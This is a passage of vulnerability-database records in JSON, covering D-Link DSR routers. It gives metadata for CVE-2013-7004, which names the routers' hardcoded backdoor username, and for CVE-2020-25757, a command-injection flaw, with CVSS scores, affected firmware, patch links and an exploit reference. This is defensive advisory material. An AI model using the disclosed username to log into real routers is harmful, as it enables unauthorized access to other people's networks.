            "id": "VHN-67006",
            "impactScore": 6.9,
            "integrityImpact": "NONE",
            "severity": "HIGH",
            "trust": 0.1,
            "vectorString": "AV:N/AC:L/AU:N/C:C/I:N/A:N",
            "version": "2.0"
          }
        ],
        "cvssV3": [],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2013-7004",
            "trust": 1.8,
            "value": "HIGH"
          },
          {
            "author": "CNVD",
            "id": "CNVD-2013-15548",
            "trust": 0.6,
            "value": "HIGH"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-201312-400",
            "trust": 0.6,
            "value": "HIGH"
          },
          {
            "author": "VULHUB",
            "id": "VHN-67006",
            "trust": 0.1,
            "value": "HIGH"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2013-15548"
      },
      {
        "db": "VULHUB",
        "id": "VHN-67006"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-005615"
      },
      {
        "db": "NVD",
        "id": "CVE-2013-7004"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201312-400"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "D-Link DSR-150 with firmware before 1.08B44; DSR-150N with firmware before 1.05B64; DSR-250 and DSR-250N with firmware before 1.08B44; and DSR-500, DSR-500N, DSR-1000, and DSR-1000N with firmware before 1.08B77 have a hardcoded account of username gkJ9232xXyruTRmY, which makes it easier for remote attackers to obtain access by leveraging knowledge of the username. plural D-Link Router product firmware is user name gkJ9232xXyruTRmY There is a vulnerability that can be obtained because it has a hard-coded account.An access right may be obtained by using the user name information by a third party. D-Link DSR is a wireless service router product developed by D-Link. D-Link DSR Router Series are prone to a security-bypass vulnerability. A trust management vulnerability exists in several D-Link products. The vulnerability stems from the fact that the program has a hard-coded user account named \u0027gkJ9232xXyruTRmY\u0027. The following products and versions are affected: DSR-150 with firmware version 1.08B29 and earlier; DSR-150N with firmware version 1.05B51 and earlier; DSR-250 and DSR-250N with firmware version 1.08B39 and earlier; DSR-500, DSR-500N, DSR-1000, DSR-1000N with previous firmware versions",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2013-7004"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-005615"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2013-15548"
      },
      {
        "db": "BID",
        "id": "64462"
      },
      {
        "db": "VULHUB",
        "id": "VHN-67006"
      }
    ],
    "trust": 2.52
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2013-7004",
        "trust": 3.4
      },
      {
        "db": "EXPLOIT-DB",
        "id": "30061",
        "trust": 2.3
      },
      {
        "db": "BID",
        "id": "64462",
        "trust": 1.0
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-005615",
        "trust": 0.8
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201312-400",
        "trust": 0.7
      },
      {
        "db": "CNVD",
        "id": "CNVD-2013-15548",
        "trust": 0.6
      },
      {
        "db": "VULHUB",
        "id": "VHN-67006",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2013-15548"
      },
      {
        "db": "VULHUB",
        "id": "VHN-67006"
      },
      {
        "db": "BID",
        "id": "64462"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-005615"
      },
      {
        "db": "NVD",
        "id": "CVE-2013-7004"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201312-400"
      }
    ]
  },
  "id": "VAR-201312-0289",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2013-15548"
      },
      {
        "db": "VULHUB",
        "id": "VHN-67006"
      }
    ],
    "trust": 0.06999999999999999
  },
  "iot_taxonomy": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "category": [
          "IoT",
          "Network device"
        ],
        "sub_category": null,
        "trust": 0.6
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2013-15548"
      }
    ]
  },
  "last_update_date": "2023-12-18T12:08:58.415000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "Services Routers",
        "trust": 0.8,
        "url": "http://www.dlink.com/us/en/business-solutions/security/services-routers"
      },
      {
        "title": "\u30eb\u30fc\u30bf\uff0f\u30d5\u30a1\u30a4\u30a2\u30a6\u30a9\u30fc\u30eb",
        "trust": 0.8,
        "url": "http://www.dlink-jp.com/router-firewall"
      },
      {
        "title": "Downloads",
        "trust": 0.8,
        "url": "http://tsd.dlink.com.tw/"
      },
      {
        "title": "D-Link DSR Router built-in account vulnerability patch",
        "trust": 0.6,
        "url": "https://www.cnvd.org.cn/patchinfo/show/41959"
      },
      {
        "title": "DSR-250N_A1_FW1",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=47082"
      },
      {
        "title": "DSR-250_A1_FW1",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=47081"
      },
      {
        "title": "DSR-150N_A2_FW1",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=47080"
      },
      {
        "title": "DSR-150_A2_FW1",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=47079"
      },
      {
        "title": "DSR-150_A1_FW1",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=47078"
      },
      {
        "title": "DSR-1000_A1_FW1",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=47085"
      },
      {
        "title": "DSR-500N_A1_FW1",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=47084"
      },
      {
        "title": "DSR-500_A1_FW1",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=47083"
      },
      {
        "title": "DSR-1000N_A1_FW1",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=47086"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2013-15548"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-005615"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201312-400"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-255",
        "trust": 1.9
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-67006"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-005615"
      },
      {
        "db": "NVD",
        "id": "CVE-2013-7004"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 2.3,
        "url": "http://www.exploit-db.com/exploits/30061"
      },
      {
        "trust": 1.7,
        "url": "http://tsd.dlink.com.tw/temp/pmd/12879/dsr-500_500n_1000_1000n_a1_release_notes_fw_v1.08b77_ww.pdf"
      },
      {
        "trust": 1.7,
        "url": "http://tsd.dlink.com.tw/temp/pmd/12960/dsr-150n_a2_release_notes_fw_v1.05b64_ww.pdf"
      },
      {
        "trust": 1.7,
        "url": "http://tsd.dlink.com.tw/temp/pmd/12966/dsr-150_a1_a2_release_notes_fw_v1.08b44_ww.pdf"
      },
      {
        "trust": 1.7,
        "url": "http://tsd.dlink.com.tw/temp/pmd/13039/dsr-250_250n_a1_a2_release_notes_fw_v1.08b44_ww_ru.pdf"
      },
      {
        "trust": 0.8,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-7004"
      },
      {
        "trust": 0.8,
        "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2013-7004"
      },
      {
        "trust": 0.3,
        "url": "http://tsd.dlink.com.tw/"
      },
      {
        "trust": 0.3,
        "url": "http://www.dlink.com/"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2013-15548"
      },
      {
        "db": "VULHUB",
        "id": "VHN-67006"
      },
      {
        "db": "BID",
        "id": "64462"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-005615"
      },
      {
        "db": "NVD",
        "id": "CVE-2013-7004"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201312-400"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "CNVD",
        "id": "CNVD-2013-15548"
      },
      {
        "db": "VULHUB",
        "id": "VHN-67006"
      },
      {
        "db": "BID",
        "id": "64462"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-005615"
      },
      {
        "db": "NVD",
        "id": "CVE-2013-7004"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201312-400"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2013-12-25T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2013-15548"
      },
      {
        "date": "2013-12-19T00:00:00",
        "db": "VULHUB",
        "id": "VHN-67006"
      },
      {
        "date": "2013-12-20T00:00:00",
        "db": "BID",
        "id": "64462"
      },
      {
        "date": "2013-12-20T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2013-005615"
      },
      {
        "date": "2013-12-19T04:24:57.463000",
        "db": "NVD",
        "id": "CVE-2013-7004"
      },
      {
        "date": "2013-12-25T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201312-400"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2013-12-25T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2013-15548"
      },
      {
        "date": "2013-12-19T00:00:00",
        "db": "VULHUB",
        "id": "VHN-67006"
      },
      {
        "date": "2013-12-20T00:00:00",
        "db": "BID",
        "id": "64462"
      },
      {
        "date": "2013-12-20T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2013-005615"
      },
      {
        "date": "2023-04-26T19:27:52.350000",
        "db": "NVD",
        "id": "CVE-2013-7004"
      },
      {
        "date": "2023-04-27T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201312-400"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201312-400"
      }
    ],
    "trust": 0.6
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "plural  D-Link Vulnerability to obtain access rights in router product firmware",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-005615"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "trust management problem",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201312-400"
      }
    ],
    "trust": 0.6
  }
}

VAR-202012-0331

Vulnerability from variot - Updated: 2021-12-17 04:57

A lack of input validation and access controls in Lua CGIs on D-Link DSR VPN routers may result in arbitrary input being passed to system command APIs, resulting in arbitrary command execution with root privileges. This affects DSR-150, DSR-250, DSR-500, and DSR-1000AC with firmware 3.14 and 3.17. plural D-Link For routers made OS There are command injection vulnerabilities and input verification vulnerabilities.Information is obtained, information is tampered with, and service is disrupted (DoS) It may be put into a state

Show details on source website

{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-202012-0331",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "dsr-150n",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "3.17"
      },
      {
        "model": "dsr-500ac",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "3.17"
      },
      {
        "model": "dsr-500n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "*"
      },
      {
        "model": "dsr-1000n",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "3.17"
      },
      {
        "model": "dsr-1000ac",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "3.17"
      },
      {
        "model": "dsr-250n",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "3.17"
      },
      {
        "model": "dsr-250",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "3.17"
      },
      {
        "model": "dsr-150",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "3.17"
      },
      {
        "model": "dsr-500",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "3.17"
      },
      {
        "model": "dsr-1000",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "3.17"
      },
      {
        "model": "dsr-1000",
        "scope": null,
        "trust": 0.8,
        "vendor": "d link",
        "version": null
      },
      {
        "model": "dsr-500ac",
        "scope": null,
        "trust": 0.8,
        "vendor": "d link",
        "version": null
      },
      {
        "model": "dsr-150n",
        "scope": null,
        "trust": 0.8,
        "vendor": "d link",
        "version": null
      },
      {
        "model": "dsr-150",
        "scope": null,
        "trust": 0.8,
        "vendor": "d link",
        "version": null
      },
      {
        "model": "dsr-1000ac",
        "scope": null,
        "trust": 0.8,
        "vendor": "d link",
        "version": null
      },
      {
        "model": "dsr-250n",
        "scope": null,
        "trust": 0.8,
        "vendor": "d link",
        "version": null
      },
      {
        "model": "dsr-500n",
        "scope": null,
        "trust": 0.8,
        "vendor": "d link",
        "version": null
      },
      {
        "model": "dsr-1000n",
        "scope": null,
        "trust": 0.8,
        "vendor": "d link",
        "version": null
      },
      {
        "model": "dsr-250",
        "scope": null,
        "trust": 0.8,
        "vendor": "d link",
        "version": null
      },
      {
        "model": "dsr-500",
        "scope": null,
        "trust": 0.8,
        "vendor": "d link",
        "version": null
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2020-25757"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-014726"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-150_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndIncluding": "3.17",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:dlink:dsr-150:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:dlink:dsr-150_firmware:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "3.17",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:dlink:dsr-150:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": false
              }
            ],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-150n_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndIncluding": "3.17",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:dlink:dsr-150n:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:dlink:dsr-150n_firmware:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "3.17",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:dlink:dsr-150n:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": false
              }
            ],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-250_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndIncluding": "3.17",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:dlink:dsr-250:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:dlink:dsr-250_firmware:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "3.17",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:dlink:dsr-250:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": false
              }
            ],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-250n_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndIncluding": "3.17",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:dlink:dsr-250n:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:dlink:dsr-250n_firmware:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "3.17",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:dlink:dsr-250n:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": false
              }
            ],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-500_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndIncluding": "3.17",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:dlink:dsr-500:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:dlink:dsr-500_firmware:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "3.17",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:dlink:dsr-500:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": false
              }
            ],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-500n_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:dlink:dsr-500n:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:dlink:dsr-500n_firmware:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:dlink:dsr-500n:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": false
              }
            ],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-500ac_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndIncluding": "3.17",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:dlink:dsr-500ac:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:dlink:dsr-500ac_firmware:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "3.17",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:dlink:dsr-500ac:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": false
              }
            ],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-1000_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndIncluding": "3.17",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:dlink:dsr-1000:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:dlink:dsr-1000_firmware:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "3.17",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:dlink:dsr-1000:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": false
              }
            ],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-1000n_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndIncluding": "3.17",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:dlink:dsr-1000n:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:dlink:dsr-1000n_firmware:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "3.17",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:dlink:dsr-1000n:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": false
              }
            ],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-1000ac_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndIncluding": "3.17",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:dlink:dsr-1000ac:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:dlink:dsr-1000ac_firmware:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "3.17",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:dlink:dsr-1000ac:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": false
              }
            ],
            "operator": "AND"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2020-25757"
      }
    ]
  },
  "cve": "CVE-2020-25757",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "LOW",
            "accessVector": "ADJACENT_NETWORK",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "COMPLETE",
            "baseScore": 8.3,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 6.5,
            "id": "CVE-2020-25757",
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "HIGH",
            "trust": 1.8,
            "userInteractionRequired": false,
            "vectorString": "AV:A/AC:L/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "LOW",
            "attackVector": "ADJACENT_NETWORK",
            "author": "NVD",
            "availabilityImpact": "HIGH",
            "baseScore": 8.8,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "exploitabilityScore": 2.8,
            "id": "CVE-2020-25757",
            "impactScore": 5.9,
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "trust": 1.0,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.1"
          },
          {
            "attackComplexity": "Low",
            "attackVector": "Adjacent Network",
            "author": "NVD",
            "availabilityImpact": "High",
            "baseScore": 8.8,
            "baseSeverity": "High",
            "confidentialityImpact": "High",
            "exploitabilityScore": null,
            "id": "CVE-2020-25757",
            "impactScore": null,
            "integrityImpact": "High",
